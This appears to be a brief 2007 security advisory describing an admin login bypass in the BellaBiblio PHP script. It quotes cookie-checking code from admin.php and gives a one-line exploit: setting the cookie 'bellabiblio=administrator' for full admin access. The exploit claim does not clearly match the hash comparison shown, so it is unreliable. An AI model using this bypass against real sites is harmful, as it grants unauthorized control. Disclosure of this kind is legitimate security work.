Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17659
HistoryJul 31, 2007 - 12:00 a.m.

BellaBiblio Admin Login Bypass

2007-07-3100:00:00
vulners.com
24

BellaBiblio Admin Login Bypass

SCRIPT: BellaBiblio

DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip

AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>

Bug in;(admin.php)
if (isset($_COOKIE['bellabiblio'])) {
if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";

EXPLOIT:

Set your cookie: bellabiblio=administrator http:/site.com/admin.php
And you have full admin access